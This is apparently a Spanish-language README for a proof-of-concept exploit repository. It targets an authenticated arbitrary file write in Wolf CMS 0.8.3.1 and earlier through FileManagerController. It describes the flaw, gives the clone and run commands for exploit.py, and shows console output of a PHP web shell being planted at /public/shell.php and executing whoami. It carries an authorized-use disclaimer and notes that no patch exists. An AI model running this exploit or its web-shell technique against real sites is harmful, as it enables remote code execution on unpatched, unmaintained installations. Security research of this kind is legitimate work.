
Exploit PoC para Wolf CMS <= 0.8.3.1: autentica en Admin, escribe un archivo PHP arbitrario en /public mediante FileManagerController y ejecuta comandos a través de una web shell.
Este repositorio contiene un exploit de Prueba de Concepto (PoC) para CVE-2026-67206
Este proyecto se proporciona únicamente con fines educativos y para pruebas de seguridad autorizadas. No lo utilice contra sistemas que no sean de su propiedad o para los que no tenga permiso de prueba.
Existe una vulnerabilidad de escritura arbitraria de archivos en las versiones de Wolf CMS hasta la 0.8.3.1. Permite a un atacante autenticado escribir archivos arbitrarios maliciosos en el directorio /public de la raíz web mediante las funciones create_file() y save() de FileManagerController.php. La función create_file() de FileManagerController.php no valida las extensiones de archivo, lo que permite a atacantes autenticados escribir scripts PHP maliciosos y obtener privilegios de ejecución remota de código.
Puede encontrar un análisis detallado con análisis de código fuente y demostración del exploit en mi blog de Medium.
Todas las versiones de Wolf CMS hasta la 0.8.3.1 están afectadas. El repositorio de Wolf CMS fue archivado el 28 de agosto de 2021 y ya no se mantiene activamente. Actualmente no existen parches para esta vulnerabilidad.
git clone https://github.com/anirbala98/CVE-2026-67206.git
cd CVE-2026-67206/
pip install -r requirements.txt
python exploit.py <base_url> -u <username> -p <password>
python exploit.py http://127.0.0.1:8080/ -u admin -p admin
└─$ python exploit.py http://127.0.0.1:8080/ -u admin -p 12966cc814K
[*] Iniciando sesión con las credenciales proporcionadas...
[+] Inicio de sesión exitoso
[*] Creando un archivo llamado shell.php...
[+] Creación del archivo exitosa
[*] Intentando escribir el payload en shell.php...
[+] ¡Payload escrito exitosamente!
[+] Se puede acceder a la web shell con la cadena de consulta 'cmd' en http://127.0.0.1:8080/public/shell.php
[+] Probando la salida de http://127.0.0.1:8080/public/shell.php?cmd=whoami
www-data